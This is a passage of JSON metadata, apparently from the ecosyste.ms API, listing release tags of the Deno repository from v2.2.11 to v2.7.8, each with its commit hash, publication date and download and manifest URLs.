purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","m